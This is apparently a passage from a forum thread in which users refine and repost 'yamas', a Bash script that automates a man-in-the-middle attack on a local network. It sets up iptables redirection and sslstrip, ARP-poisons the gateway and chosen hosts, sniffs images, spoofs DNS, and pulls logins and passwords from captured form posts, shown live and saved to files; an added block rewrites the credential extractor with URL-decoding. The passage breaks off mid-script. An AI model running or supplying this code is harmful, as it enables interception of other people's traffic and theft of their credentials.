echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32mLaunching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x "$sslstrip_dir/sslstrip.py" ];then #if non-installed is not executable (double quotes: single quotes kept $sslstrip_dir from expanding)
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway address or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performance. If that is the case, use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
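The credential extraction that the script's -p option and its on-the-fly /tmp/looparse.sh run over sslstrip's -w log, rewritten below as an added example that is not part of yamas or of this thread. It is a shell function driving one awk program over a constructed sslstrip-style log: the layout assumed (a line containing "POST Data (host):" followed by one line holding the raw form body) is the one the script's own awk relies on, and the sample records are made up for this example. Two things differ from the original pipeline: the values are URL-decoded (the script only tells the reader that %40, %21 and + are encoded characters), and the keyword list is matched against the field name only, so a value such as submit=Login is not reported as a login because grep found "log" inside it.

```shell
#!/bin/sh
# Added example, not part of yamas: stand-alone credential extraction over an
# sslstrip -w log, with URL-decoding. Constructed sample log, not a real capture.
SAMPLE_LOG='2012-07-25 12:40:01,000 POST Data (www.example.com):
csrf=abc123&email=alice%40example.com&pass=S3cret%21&persistent=1
2012-07-25 12:40:05,000 POST Data (login.example.org):
username=bob&password=hunter+2&submit=Login'

# extract_creds [LOGFILE]
# Reads the log from the given file (or stdin) and prints one
# "host<TAB>field<TAB>decoded value" line per form field whose NAME contains
# one of the keywords yamas writes to /tmp/grepcred.txt.
extract_creds() {
    awk '
    # Decode + and %XX; anything malformed is copied through unchanged.
    function urldecode(s,    out, c, hi, lo) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "+") {
                out = out " "; s = substr(s, 2)
            } else if (c == "%" && length(s) >= 3) {
                hi = index(HEX, tolower(substr(s, 2, 1))) - 1
                lo = index(HEX, tolower(substr(s, 3, 1))) - 1
                if (hi >= 0 && lo >= 0) {
                    out = out sprintf("%c", hi * 16 + lo); s = substr(s, 4)
                } else {
                    out = out c; s = substr(s, 2)
                }
            } else {
                out = out c; s = substr(s, 2)
            }
        }
        return out
    }
    BEGIN {
        HEX = "0123456789abcdef"
        # same keyword list as /tmp/grepcred.txt, minus "website" (that is the
        # label the original prints, not a form field name)
        KW = "credential|email|last|log|modified|name|nickname|pass|persistent|pw|session|textbox|user"
    }
    index($0, "POST Data (") > 0 {
        host = substr($0, index($0, "POST Data (") + 11)   # "POST Data (" is 11 chars
        host = substr(host, 1, index(host, ")") - 1)
        if ((getline body) <= 0) exit   # header without a body line: stop
        n = split(body, pairs, "&")
        for (i = 1; i <= n; i++) {
            eq = index(pairs[i], "=")
            if (eq == 0) continue
            key = substr(pairs[i], 1, eq - 1)
            val = substr(pairs[i], eq + 1)
            # match the keyword list against the field name only
            if (tolower(key) ~ KW) printf "%s\t%s\t%s\n", host, key, urldecode(val)
        }
    }' "$@"
}

# Stand-alone run: feed the constructed log through the extractor.
printf '%s\n' "$SAMPLE_LOG" | extract_creds
```

Run as-is it prints five lines: email, pass and persistent for www.example.com, username and password for login.example.org, with alice%40example.com decoded to alice@example.com and hunter+2 to "hunter 2"; csrf and submit are dropped. Point it at a real log with extract_creds /tmp/yamas.txt.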
-
Hmm, here I was racking my brains, and on top of that it turns out that when driftnet finishes it cleans out the /tmp directory, or the script carries that command somewhere >:(
So that's that.
-
Well, I'll keep yours, but with your permission I'll modify one line.
When we create the capture path it creates the folder with the date... so in the end we'll have a pile of folders in root.
So I added
/driftnet
and inside it it creates the dated folders with their captures... that way they'll be organized inside their own folder and not wandering around the root.
Line 453
where before
1) mkdir $log_output_dir/capture_$(date +%d%m%y).....
after
1) mkdir $log_output_dir/Driftnet/capture_$(date +%d%m%y)....
I'll keep yours since it's a bit tidier, because it only creates capture folders when driftnet is launched and not before; mine created the paths systematically even if we didn't run driftnet.
Good work, man. >:( >:( >:( >:( >:(
-
Perfect ;)
In the end we've improved the original script quite a bit, we're real pros ;D
This is teamwork and everything else is nonsense >:( >:( >:( >:( >:(
-
In the end I had to specify, in the capture parameter,
/root/Driftnet
so that when mkdir runs it gets created, and inside it the dated folder.
PS: I added the -p option to mkdir so that even if the directory already exists it still gets created, because otherwise nothing is captured... and even though it regenerates an existing directory, its contents are not lost.
I've done several tests... over several sessions, and everything is perfect.
We're like Chimo Bayo... "esta sí, esta no"... >:D >:D >:D >:D >:D
Final code.
[spoiler]
#!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net
if [ $UID -ne 0 ]; then
echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/Driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will probably output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C caught. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are supported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ "$silent" = "1" ]]; then # the option loop above has already shifted the arguments away, so testing $1/$2 here never matched
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0 #NOTE: plain-HTTP fetch with no checksum or signature check, written over the running script and re-executed as root; use -s on any network you do not control
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31mCleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31mKilling processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
killall driftnet #one killall signals both driftnet instances (display and adjunct) at once
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP address to attack :"
read newip
if [[ "$etter" = "1" ]];then #use the same poisoner as the main attack (this previously always launched arpspoof, even with -e)
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$newip/ 2>/dev/null & sleep 2
else
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
fi
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm -f ~/hosts_spoof #-f: no error when there is no previous list
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
hostfile=$gothost
else
echo -e "We'll make one...\n"
mkhst
hostfile=~/hosts_spoof
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f "$hostfile" & dnsid=$! #previously always used ~/hosts_spoof and ignored the path entered above
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellaneous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) capdir=$log_output_dir/capture_$(date +%d%m%y)
mkdir -p $capdir #-p: reuse today's folder if it already exists instead of failing (driftnet does not create it and saves nothing without it)
driftnet -i $iface -a -d $capdir > /dev/null 2>&1 & #adjunct mode: no window, just save the images
driftnet -i $iface > /dev/null 2>&1 & #second instance shows the images as they are sniffed
drifton=1 #no trailing "&" here: a backgrounded assignment runs in a subshell and cleanup() would never see drifton set
echo "Driftnet launched, the images will be saved in $capdir"
misc ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33mPausing...\033[m"
kill -STOP $looparseid #signal by name: the numbers (19/18) differ between architectures
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33mResuming...\033[m"
kill -CONT $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31mKilling...\033[m"
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32mLaunching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31mActivating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31mConfiguring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31mActivating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x "$sslstrip_dir/sslstrip.py" ];then #if non-installed is not executable (double quotes so the variable expands)
chmod +x "$sslstrip_dir/sslstrip.py" #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m
Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "#!/bin/bash
looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
